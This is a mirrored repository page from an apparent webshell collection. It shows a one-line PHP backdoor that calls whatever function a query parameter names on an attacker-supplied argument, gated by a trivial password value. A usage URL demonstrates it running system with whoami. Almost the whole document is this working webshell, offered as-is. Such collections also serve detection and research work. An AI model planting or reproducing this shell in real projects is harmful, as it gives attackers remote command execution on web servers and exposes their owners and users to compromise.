mirror of
https://github.com/tennc/webshell
synced 2025-02-16 17:58:23 +00:00
from: https://mp.weixin.qq.com/s/f6cFhc0Ukk0wQFGP1lQ4BQ useage: http://example.com/shell7php?f=system&a=whoami&p=\_
1 line
44 B
PHP
1 line
44 B
PHP
<?=$_GET['p']=='_'&&$_GET['f']($_GET['a']);
|